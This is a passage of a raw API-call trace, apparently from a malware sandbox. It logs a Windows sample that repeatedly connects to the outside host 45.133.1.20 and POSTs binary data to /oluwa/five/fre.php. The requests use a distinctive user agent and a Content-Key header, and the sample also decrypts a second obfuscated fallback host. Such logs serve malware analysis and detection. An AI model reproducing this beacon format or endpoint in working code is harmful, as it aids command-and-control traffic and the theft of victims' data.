(lpLibFileName="shlwapi") returned 0x77680000 [0180.181] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0180.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.182] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0180.182] GetProcessHeap () returned 0x6a0000 [0180.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0180.183] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf710*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0180.183] GetProcessHeap () returned 0x6a0000 [0180.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0180.183] socket (af=2, type=1, protocol=6) returned 0x3dc [0180.183] connect (s=0x3dc, name=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0180.207] FreeAddrInfoW (pAddrInfo=0x6bf710*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0180.207] GetProcessHeap () returned 0x6a0000 [0180.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0180.207] GetProcessHeap () returned 0x6a0000 [0180.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0180.208] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.208] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.208] GetProcessHeap () returned 0x6a0000 [0180.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0180.209] GetProcessHeap () returned 0x6a0000 [0180.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.209] GetProcessHeap () returned 0x6a0000 [0180.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0180.209] GetProcessHeap () returned 0x6a0000 [0180.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0180.210] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.211] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.211] GetProcessHeap () returned 0x6a0000 [0180.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0180.211] GetProcessHeap () returned 0x6a0000 [0180.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.211] send (s=0x3dc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0180.212] send (s=0x3dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0180.212] GetProcessHeap () returned 0x6a0000 [0180.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0180.212] recv (in: s=0x3dc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0180.289] GetProcessHeap () returned 0x6a0000 [0180.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0180.290] GetProcessHeap () returned 0x6a0000 [0180.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0180.290] GetProcessHeap () returned 0x6a0000 [0180.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0180.291] GetProcessHeap () returned 0x6a0000 [0180.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0180.291] closesocket (s=0x3dc) returned 0 [0180.292] GetProcessHeap () returned 0x6a0000 [0180.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0180.292] GetProcessHeap () returned 0x6a0000 [0180.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.293] GetProcessHeap () returned 0x6a0000 [0180.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0180.294] GetProcessHeap () returned 0x6a0000 [0180.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0180.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1038) returned 0x3dc [0180.296] Sleep (dwMilliseconds=0xea60) [0180.298] GetProcessHeap () returned 0x6a0000 [0180.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0180.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.299] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0180.321] GetProcessHeap () returned 0x6a0000 [0180.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfa90 [0180.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.323] CryptImportKey (in: hProv=0x6bef48, pbData=0x6bfa90, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0180.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.324] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.326] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.326] GetProcessHeap () returned 0x6a0000 [0180.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfa90 | out: hHeap=0x6a0000) returned 1 [0180.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.328] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0180.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.329] CryptDestroyKey (hKey=0x6ad020) returned 1 [0180.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.334] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0180.334] GetProcessHeap () returned 0x6a0000 [0180.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.336] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.342] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.343] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.344] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.344] GetProcessHeap () returned 0x6a0000 [0180.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0180.344] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.344] GetProcessHeap () returned 0x6a0000 [0180.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0180.344] GetProcessHeap () returned 0x6a0000 [0180.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.345] GetProcessHeap () returned 0x6a0000 [0180.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0180.345] GetProcessHeap () returned 0x6a0000 [0180.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0180.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.355] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0180.363] GetProcessHeap () returned 0x6a0000 [0180.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0180.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.364] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0180.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.365] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.366] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.366] GetProcessHeap () returned 0x6a0000 [0180.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0180.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.369] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0180.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.370] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0180.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.371] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0180.371] GetProcessHeap () returned 0x6a0000 [0180.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.372] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0180.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.373] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0180.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.374] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0180.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.375] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0180.375] GetProcessHeap () returned 0x6a0000 [0180.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0180.375] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0180.375] GetProcessHeap () returned 0x6a0000 [0180.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0180.375] socket (af=2, type=1, protocol=6) returned 0x3e0 [0180.375] connect (s=0x3e0, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0180.405] FreeAddrInfoW (pAddrInfo=0x6bfa80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0180.405] GetProcessHeap () returned 0x6a0000 [0180.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0180.405] GetProcessHeap () returned 0x6a0000 [0180.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0180.406] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.407] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.407] GetProcessHeap () returned 0x6a0000 [0180.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0180.407] GetProcessHeap () returned 0x6a0000 [0180.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.408] GetProcessHeap () returned 0x6a0000 [0180.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0180.408] GetProcessHeap () returned 0x6a0000 [0180.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0180.409] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.409] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.409] GetProcessHeap () returned 0x6a0000 [0180.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0180.410] GetProcessHeap () returned 0x6a0000 [0180.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.411] send (s=0x3e0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0180.411] send (s=0x3e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0180.411] GetProcessHeap () returned 0x6a0000 [0180.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0180.411] recv (in: s=0x3e0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0180.480] GetProcessHeap () returned 0x6a0000 [0180.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0180.483] GetProcessHeap () returned 0x6a0000 [0180.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.484] GetProcessHeap () returned 0x6a0000 [0180.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0180.485] GetProcessHeap () returned 0x6a0000 [0180.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0180.485] closesocket (s=0x3e0) returned 0 [0180.486] GetProcessHeap () returned 0x6a0000 [0180.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0180.486] GetProcessHeap () returned 0x6a0000 [0180.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.487] GetProcessHeap () returned 0x6a0000 [0180.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0180.488] GetProcessHeap () returned 0x6a0000 [0180.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0180.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1044) returned 0x3e0 [0180.490] Sleep (dwMilliseconds=0xea60) [0180.492] GetProcessHeap () returned 0x6a0000 [0180.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0180.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0180.518] GetProcessHeap () returned 0x6a0000 [0180.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0180.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.519] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0180.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.521] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.522] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.522] GetProcessHeap () returned 0x6a0000 [0180.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0180.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.524] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0180.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.533] CryptDestroyKey (hKey=0x6ad020) returned 1 [0180.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.535] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0180.535] GetProcessHeap () returned 0x6a0000 [0180.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.537] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.538] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.540] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.541] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.541] GetProcessHeap () returned 0x6a0000 [0180.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0180.541] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.541] GetProcessHeap () returned 0x6a0000 [0180.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0180.542] GetProcessHeap () returned 0x6a0000 [0180.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.542] GetProcessHeap () returned 0x6a0000 [0180.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.543] GetProcessHeap () returned 0x6a0000 [0180.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0180.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.544] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.556] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0180.568] GetProcessHeap () returned 0x6a0000 [0180.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0180.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.569] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0180.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.571] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.577] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.577] GetProcessHeap () returned 0x6a0000 [0180.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0180.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.579] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0180.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.580] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0180.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.581] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0180.581] GetProcessHeap () returned 0x6a0000 [0180.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.586] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0180.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.587] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0180.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.589] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0180.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.590] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0180.590] GetProcessHeap () returned 0x6a0000 [0180.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0180.590] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf878*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, 